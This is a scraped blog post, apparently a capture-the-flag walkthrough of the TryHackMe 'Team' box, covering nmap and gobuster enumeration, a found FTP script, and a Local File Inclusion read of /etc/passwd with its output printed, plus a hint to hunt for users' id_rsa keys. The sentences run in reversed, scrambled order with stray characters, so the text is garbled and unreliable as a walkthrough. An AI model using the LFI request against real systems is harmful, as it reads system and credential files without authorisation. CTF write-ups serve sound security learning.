![]() ![]() These can be modified on-the-fly or can be viewed together with their responses in the "HTTP history" tab.Ĭlick “Proxy” → “Intercept” → “Intercept On” to stop intercepting requests. I used the following list of paths which could be checked using LFI vulnerabilities.The proxy is used to intercept requests from your browser. We can view some files usally hidden on the server The txt on the FTP server also reveals that we should look at some configuration files in order to find the id_rsa private key of the dale or gyles user. Landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin Messagebus:x:103:107::/nonexistent:/usr/sbin/nologin Systemd-resolve:x:101:103:systemd Resolver,:/run/systemd/resolve:/usr/sbin/nologin Systemd-network:x:100:102:systemd Network Management,:/run/systemd/netif:/usr/sbin/nologin Gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin List:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin Uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin News:x:9:9:news:/var/spool/news:/usr/sbin/nologin Mail:x:8:8:mail:/var/mail:/usr/sbin/nologin Lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin Man:x:6:12:man:/var/cache/man:/usr/sbin/nologin Games:x:5:60:games:/usr/games:/usr/sbin/nologin Browsing to this URL reveals root:x:0:0:root:/root:/bin/bashĭaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin Let’s test this out by browsing to :///script.php?page=/etc/passwd. It seems like there is a Local File Inclusion vulnerability in place here. Following this link reveals the following URL in the path. ![]() There is one single link on the dev website. You should now be able to find the following website when browsing to. Source_folder="/home/username/source_folder/"ĭest_folder="/home/username/linux/dest_folder/"įtp -in $ftp_server " > /etc/hosts Read -sp "Enter Username Password: " REDACTED You can see the output of this scan below /script.txt (Status: 200)īrowse to to find a txt file containing the following lines: #!/bin/bash gobuster -w /usr/share/wordlists/ -x txt,js Let’s run gobuster once again to find hidden files and directories within the scripts directory. The most interesting directory here is the scripts directory. The outcome is listed below /assets (Status: 301) Run the following command: gobuster -w /usr/share/wordlists/ ![]() Let’s try to find some hidden directories and files using gobuster. Because anonymous login is prohibited, we start by enumerating the web server. Port 21 is used for FTP, port 22 is used for SSH and port 80 serves a web server. Service Info: OSs: Unix, Linux CPE: cpe:/o:linux:linux_kernel |_http-server-header: Apache/2.4.29 (Ubuntu) |_ Supported Methods: POST OPTIONS HEAD GET |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHUxjoul7JvmqQMtGOuadBwi2mBVCdXhJjoG5x+l+uQnĨ0/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBM4d9TCz3FkEBEJ1VMjOsCrxsbS3YGb7mu9WgtnaFPZs2eG4ssCWz9nWeLolFgvHyT5WxRT0SFSv3vCZCtN86I= | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRK/xFh/H4lC7shWUUvK9lKxd3VO2OwfsC8LjFEU2CnEUrbVCnzx8jiVp5gO+CVAj63+GXkbIuXpynlQ/4j1dXdVUz/yAZ96cHiCNo6S5ThONoG2g2ObJSviCX2wBXhUJEzW07mRdtx4nesr6XWMj9hwIlSfSBS2iPEiqHfGrjp14NjG6Xmq5hxZh5Iq3dBrOd/ZZKjGsHe+RElAMzIwRK5NwFlE7zt7ZiANrFSy4YD4zerNSyEnjPdnE6/ArBmqOFtsWKZ2p/Wc0oLOP7d6YBwQyZ9yQNVGYS9gDIGZyQCYsMDVJf7jNvRp/3Ru53FMRcsYm5+ItIrgrx5GbpA+LR You can see the output of this scan below: PORT STATE SERVICE REASON VERSIONĢ2/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux protocol 2.0) The sC and sV flags indicate that basic vulnerability scripts are executed against the target and that the port scan tries to find version information. echo " team.thm" > /etc/hosts TryHackMe Team – EnumerationĪs per usual, we start by running a port scan on the host using nmap. Before we start enumerating the box, add the following line to your /etc/hosts file. This writeup will help you solve the Team box on TryHackMe. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |